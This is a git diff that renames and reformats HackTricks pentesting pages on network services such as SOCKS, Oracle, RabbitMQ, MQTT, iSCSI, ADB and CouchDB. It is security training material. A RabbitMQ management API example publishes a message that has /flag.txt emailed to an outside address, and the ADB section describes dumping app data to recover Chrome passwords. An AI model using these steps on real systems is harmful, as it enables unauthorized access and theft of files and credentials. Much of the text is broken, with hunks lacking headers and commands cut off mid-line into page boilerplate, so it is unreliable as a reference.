diff --git a/pentesting/1026-pentesting-rusersd.md b/network-services-pentesting/1026-pentesting-rusersd.md
similarity index 100%
rename from pentesting/1026-pentesting-rusersd.md
rename to network-services-pentesting/1026-pentesting-rusersd.md
diff --git a/pentesting/1080-pentesting-socks.md b/network-services-pentesting/1080-pentesting-socks.md
similarity index 89%
rename from pentesting/1080-pentesting-socks.md
rename to network-services-pentesting/1080-pentesting-socks.md
index bf972c04..df33290f 100644
--- a/pentesting/1080-pentesting-socks.md
+++ b/network-services-pentesting/1080-pentesting-socks.md
@@ -1,4 +1,4 @@
-
+# 1080 - Pentesting Socks
@@ -16,42 +16,41 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server. SOCKS5 optionally provides authentication,
+SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server. SOCKS5 optionally provides authentication,\
so only authorized users may access a server.
-Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded.
+Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded.\
SOCKS performs at Layer 5 of the OSI model
**Default Port:** 1080
-# Enumeration
+## Enumeration
-## Authentication Check
+### Authentication Check
```bash
nmap -p 1080
@@ -102,5 +99,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md
similarity index 100%
rename from pentesting/1099-pentesting-java-rmi.md
rename to network-services-pentesting/1099-pentesting-java-rmi.md
diff --git a/pentesting/11211-memcache.md b/network-services-pentesting/11211-memcache.md
similarity index 100%
rename from pentesting/11211-memcache.md
rename to network-services-pentesting/11211-memcache.md
diff --git a/pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md
similarity index 100%
rename from pentesting/113-pentesting-ident.md
rename to network-services-pentesting/113-pentesting-ident.md
diff --git a/pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
similarity index 100%
rename from pentesting/135-pentesting-msrpc.md
rename to network-services-pentesting/135-pentesting-msrpc.md
diff --git a/pentesting/137-138-139-pentesting-netbios.md b/network-services-pentesting/137-138-139-pentesting-netbios.md
similarity index 96%
rename from pentesting/137-138-139-pentesting-netbios.md
rename to network-services-pentesting/137-138-139-pentesting-netbios.md
index a5263579..ea4b16c1 100644
--- a/pentesting/137-138-139-pentesting-netbios.md
+++ b/network-services-pentesting/137-138-139-pentesting-netbios.md
@@ -1,4 +1,4 @@
-
+# 137,138,139 - Pentesting NetBios
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# NetBios Name Service
+## NetBios Name Service
* Name service for name registration and resolution (ports: 137/udp and 137/tcp).
* Datagram distribution service for connectionless communication (port: 138/udp).
* Session service for connection-oriented communication (port: 139/tcp).
-## Name Service
+### Name Service
Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use.
@@ -42,7 +41,7 @@ nbtscan Support HackTricks and get benefits!
@@ -115,5 +113,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,33 +16,32 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
+Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)).
-Oracle database \(Oracle DB\) is a relational database management system \(RDBMS\) from the Oracle Corporation \(from [here](https://www.techopedia.com/definition/8711/oracle-database)\).
+When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-).
-When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port \(1521/TCP, -you may also get secondary listeners on 1522–1529-\).
-
-```text
+```
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
```
-# Summary
+## Summary
-1. **Enumerate version** info \(search for **known vulns**\)
-2. **Bruteforce TNS listener** communication \(not always needed\)
-3. **Enumerate**/Bruteforce **SID names** \(like database names\)
+1. **Enumerate version** info (search for **known vulns**)
+2. **Bruteforce TNS listener** communication (not always needed)
+3. **Enumerate**/Bruteforce **SID names** (like database names)
4. **Bruteforce credentials** for valid SID name discovered
-5. Try to **execute code**
+5. Try to **execute code**
In order to user MSF oracle modules you need to install some dependencies: [**Installation**](oracle-pentesting-requirements-installation.md)
-# Enumeration
+## Enumeration
Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).
-## TNS listener version
+### TNS listener version
```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV Support HackTricks and get benefits!
@@ -329,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\
In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\
@@ -25,9 +24,9 @@ The main page should looks like this:
.png>)
-# Enumeration
+## Enumeration
-The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).
+The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../generic-methodologies-and-resources/brute-force.md#http-post-form).
To manually start this module you need to execute:
@@ -55,11 +54,10 @@ Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
-## Shodan
+### Shodan
* `port:15672 http`
-
Support HackTricks and get benefits!
@@ -75,5 +73,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,32 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-
-Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol \(PPTP\) uses TCP port 1723 for key exchange and IP protocol 47 \(GRE\) to encrypt data between peers.
+Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol (PPTP) uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
**Default Port**:1723
-# Enumeration
+## Enumeration
```bash
nmap –Pn -sSV -p1723 Support HackTricks and get benefits!
@@ -57,5 +51,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
@@ -28,15 +27,15 @@ PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
-# Inspecting the traffic
+## Inspecting the traffic
MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
 (1).png>)
-## [**Brute-Force MQTT**](../brute-force.md#mqtt)
+### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
-# Pentesting MQTT
+## Pentesting MQTT
**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
@@ -88,11 +87,11 @@ if __name__ == "__main__":
main()
```
-# More information
+## More information
from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
-## The Publish/Subscribe Pattern
+### The Publish/Subscribe Pattern
The publish/subscribe model is composed of:
@@ -103,7 +102,7 @@ The publish/subscribe model is composed of:
-## Packet Format
+### Packet Format
Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
@@ -113,11 +112,10 @@ The first field of the fixed header represents the type of the MQTT Packet. All
-# Shodan
+## Shodan
* `port:1883 MQTT`
-
Support HackTricks and get benefits!
@@ -133,5 +131,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Docker Basics
-# Docker Basics
-
-## What is
+### What is
The Docker Platform is the industry-leading container platform for continuous, high-velocity innovation, enabling organizations to seamlessly build and share any application — from legacy to what comes next — and securely run them anywhere.
-## Basic docker architecture
+### Basic docker architecture
This info is from [here](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc).
@@ -35,7 +34,7 @@ This info is from [here](https://stackoverflow.com/questions/41645665/how-contai
-## Basic commands
+### Basic commands
```bash
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
@@ -60,7 +59,7 @@ docker system prune -a
# - all build cache
```
-## Containerd
+### Containerd
Containerd was designed to be used by Docker and Kubernetes as well as any other container platform that wants to **abstract away syscalls or OS specific functionality to run container**s on linux, windows, solaris, or other OSes. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don’t. Realistically this is impossible but at least that is what we try for. Things like **networking are out of scope for containerd**. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux.
@@ -82,7 +81,7 @@ ctr task kill -s SIGKILL Support HackTricks and get benefits!
@@ -366,5 +364,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,37 +16,36 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol \(IP\)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks \(LANs\), wide area networks \(WANs\), or the Internet and can enable location-independent data storage and retrieval.
+> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval.
>
-> The protocol allows clients \(called initiators\) to send SCSI commands \(CDBs\) to storage devices \(targets\) on remote servers. It is a storage area network \(SAN\) protocol, allowing organizations to consolidate storage into storage arrays while providing clients \(such as database and web servers\) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure.
+> The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure.
**Default port:** 3260
-```text
+```
PORT STATE SERVICE VERSION
3260/tcp open iscsi?
```
-# Enumeration
+## Enumeration
-```text
+```
nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx
```
This script will indicate if authentication is required.
-## [Brute force](../brute-force.md#iscsi)
+### [Brute force](../generic-methodologies-and-resources/brute-force.md#iscsi)
-## [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux)
+### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux)
**Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory.
For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the _internal_ address rather than the _public_ address:
-```text
+```
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[...]
@@ -54,7 +53,7 @@ iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
This command will create a directory in your filesystem like this:
-```text
+```
/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/
```
@@ -65,9 +64,9 @@ Within the directory, there is a default file with all the settings necessary to
You may now mount the target as per the instructions in the link.
-## [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476%28v=ws.10%29?redirectedfrom=MSDN)
+### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN)
-# **Manual enumeration**
+## **Manual enumeration**
```bash
sudo apt-get install open-iscsi
@@ -75,7 +74,7 @@ sudo apt-get install open-iscsi
First of all you need to **discover the targets** name behind the IP:
-```text
+```
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382
@@ -84,7 +83,7 @@ iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
_Note that it will show the I**P and port of the interfaces** where you can **reach** those **targets**. It can even **show internal IPs or different IPs** from the one you used._
-Then you **catch the 2nd part of the printed string of each line** \(_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ from the first line\) and **try to login**:
+Then you **catch the 2nd part of the printed string of each line** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ from the first line) and **try to login**:
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login
@@ -178,17 +177,15 @@ node.conn[0].iscsi.OFMarker = No
# END RECORD
```
-**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm)
+**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm)
-# **Shodan**
+## **Shodan**
* `port:3260 AuthMethod`
-# **References**
-
-{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" caption="" %}
-
+## **References**
+{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
@@ -205,5 +202,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/3299-pentesting-saprouter.md b/network-services-pentesting/3299-pentesting-saprouter.md
similarity index 100%
rename from pentesting/3299-pentesting-saprouter.md
rename to network-services-pentesting/3299-pentesting-saprouter.md
diff --git a/pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md
similarity index 100%
rename from pentesting/3632-pentesting-distcc.md
rename to network-services-pentesting/3632-pentesting-distcc.md
diff --git a/pentesting/3690-pentesting-subversion-svn-server.md b/network-services-pentesting/3690-pentesting-subversion-svn-server.md
similarity index 100%
rename from pentesting/3690-pentesting-subversion-svn-server.md
rename to network-services-pentesting/3690-pentesting-subversion-svn-server.md
diff --git a/pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
similarity index 100%
rename from pentesting/3702-udp-pentesting-ws-discovery.md
rename to network-services-pentesting/3702-udp-pentesting-ws-discovery.md
diff --git a/pentesting/43-pentesting-whois.md b/network-services-pentesting/43-pentesting-whois.md
similarity index 100%
rename from pentesting/43-pentesting-whois.md
rename to network-services-pentesting/43-pentesting-whois.md
diff --git a/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
similarity index 100%
rename from pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
rename to network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
diff --git a/pentesting/44134-pentesting-tiller-helm.md b/network-services-pentesting/44134-pentesting-tiller-helm.md
similarity index 100%
rename from pentesting/44134-pentesting-tiller-helm.md
rename to network-services-pentesting/44134-pentesting-tiller-helm.md
diff --git a/pentesting/44818-ethernetip.md b/network-services-pentesting/44818-ethernetip.md
similarity index 100%
rename from pentesting/44818-ethernetip.md
rename to network-services-pentesting/44818-ethernetip.md
diff --git a/pentesting/47808-udp-bacnet.md b/network-services-pentesting/47808-udp-bacnet.md
similarity index 100%
rename from pentesting/47808-udp-bacnet.md
rename to network-services-pentesting/47808-udp-bacnet.md
diff --git a/pentesting/5000-pentesting-docker-registry.md b/network-services-pentesting/5000-pentesting-docker-registry.md
similarity index 97%
rename from pentesting/5000-pentesting-docker-registry.md
rename to network-services-pentesting/5000-pentesting-docker-registry.md
index 60655542..01f483e9 100644
--- a/pentesting/5000-pentesting-docker-registry.md
+++ b/network-services-pentesting/5000-pentesting-docker-registry.md
@@ -1,4 +1,4 @@
-
+# 5000 - Pentesting Docker Registry
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
**Info from** [**here**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**.**
@@ -46,7 +45,7 @@ PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
-# Discovering
+## Discovering
The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.\
Some fingerprints:
@@ -57,9 +56,9 @@ Some fingerprints:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
-# Enumeration
+## Enumeration
-## HTTP/HTTPS
+### HTTP/HTTPS
Docker registry may be configured to use **HTTP** or **HTTPS**. So the first thing you may need to do is **find which one** is being configured:
@@ -74,7 +73,7 @@ Warning: Support HackTricks and get benefits!
@@ -312,5 +309,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
@@ -28,8 +27,7 @@ PORT STATE SERVICE
512/tcp open exec
```
-## [**Brute-force**](../brute-force.md#rexec)
-
+### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
@@ -46,5 +44,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/515-pentesting-line-printer-daemon-lpd.md b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
similarity index 100%
rename from pentesting/515-pentesting-line-printer-daemon-lpd.md
rename to network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
diff --git a/pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md
similarity index 90%
rename from pentesting/5353-udp-multicast-dns-mdns.md
rename to network-services-pentesting/5353-udp-multicast-dns-mdns.md
index dd7e8f91..bcfc6773 100644
--- a/pentesting/5353-udp-multicast-dns-mdns.md
+++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md
@@ -1,4 +1,4 @@
-
+# 5353/UDP Multicast DNS (mDNS) and DNS-SD
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras. \
+Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\
**Default port:** 5353/UDP
```
@@ -27,17 +26,17 @@ PORT STATE SERVICE
5353/udp open zeroconf
```
-## How mDNS Works
+### How mDNS Works
Devices use mDNS when the local network **lacks** a conventional **unicast DNS server**. To resolve a domain name for a local address using mDNS, the device sends a **DNS query for a domain name** ending with **.local** to the **multicast** **address** 224.0.0.251 (for IPv4) or FF02::FB (for IPv6). You can also use mDNS to resolve **global domain names** (non .local ones), but mDNS implementations are supposed to **disable** this behavior by default. mDNS requests and responses use **UDP** and **port 5353** as both the source and destination port.
The mDNS replies contain several important flags, including a **Time-to- Live** (TTL) value that signifies how many seconds the record is valid. Sending a reply with **TTL=0 means that the corresponding record should be cleared**. Another important flag is the QU bit, which denotes whether or not the query is a unicast query. If the **QU bit isn’t set**, the packet is a **multicast** query (QM). Because it’s possible to **receive unicast queries outside of the local link**, secure mDNS implementations should always **check that the source address in the packet matches the local subnet address range**.
-## How DNS-SD Works
+### How DNS-SD Works
DNS-SD allows clients to **discover available services on the network**. To use it, clients send standard DNS queries for pointer records (PTR), which map the type of service to a list of names of specific instances of that type of service.
-To request a PTR record, clients use the name form "\Support HackTricks and get benefits!
@@ -123,5 +121,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording).
>
@@ -32,7 +31,7 @@ PORT STATE SERVICE
554/tcp open rtsp
```
-# Detailed Information
+## Detailed Information
First and foremost RTSP is an HTTP like protocol. It has different structure and control commands but is textual in its format and once you learn the basics of the commands and how they interact, fairly easy to use. The specification for RTSP is pretty straightforward. Here is a link to it:
@@ -40,7 +39,7 @@ First and foremost RTSP is an HTTP like protocol. It has different structure and
RTSP can be accessed unauthenticated (common in off-the-shelf devices) or authenticated. Authenticated access mirrors HTTP in that you have Basic and Digest authentication, both nearly identical to HTTP. To find out whether your device is authenticated or unauthenticated, simply send a “DESCRIBE” request. A simple DESCRIBE request looks like:
-`DESCRIBE rtsp://Support HackTricks and get benefits!
@@ -118,5 +116,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb))
@@ -28,7 +27,7 @@ PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
-# Connect
+## Connect
If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:**
@@ -40,11 +39,11 @@ adb shell
For more ADB commands check the following page:
-{% content-ref url="../mobile-apps-pentesting/android-app-pentesting/adb-commands.md" %}
-[adb-commands.md](../mobile-apps-pentesting/android-app-pentesting/adb-commands.md)
+{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %}
+[adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md)
{% endcontent-ref %}
-## Dump App data
+### Dump App data
In order to completely download the data of an application you can:
@@ -57,11 +56,10 @@ adb pull "/sdcard/com.package"
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
-# Shodan
+## Shodan
* `android debug bridge`
-
Support HackTricks and get benefits!
@@ -77,5 +75,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported**.** AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services.
+The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported\*\*.\*\* AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services.
**Default port:** 548
@@ -28,7 +27,7 @@ PORT STATE SERVICE
548/tcp open afp
```
-# Enumeration
+## Enumeration
```bash
msf> use auxiliary/scanner/afp/afp_server_info
@@ -42,8 +41,7 @@ nmap -sV --script "afp-* and not dos and not brute" -p
@@ -60,5 +58,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/5984-pentesting-couchdb.md b/network-services-pentesting/5984-pentesting-couchdb.md
similarity index 87%
rename from pentesting/5984-pentesting-couchdb.md
rename to network-services-pentesting/5984-pentesting-couchdb.md
index 2cb452a9..4585d4f4 100644
--- a/pentesting/5984-pentesting-couchdb.md
+++ b/network-services-pentesting/5984-pentesting-couchdb.md
@@ -1,4 +1,4 @@
-
+# 5984,6984 - Pentesting CouchDB
@@ -16,32 +16,31 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **Basic Information**
+## **Basic Information**
CouchDB is a document-oriented database and within each document fields are stored as key-value maps. Fields can be either a simple key/value pair, list, or map.
-Each document that is stored in the database is given a document-level unique identifier \(`_id`\) as well as a revision \(`_rev`\) number for each change that is made and saved to the database.
+Each document that is stored in the database is given a document-level unique identifier (`_id`) as well as a revision (`_rev`) number for each change that is made and saved to the database.
-**Default port:** 5984\(http\), 6984\(https\)
+**Default port:** 5984(http), 6984(https)
-```text
+```
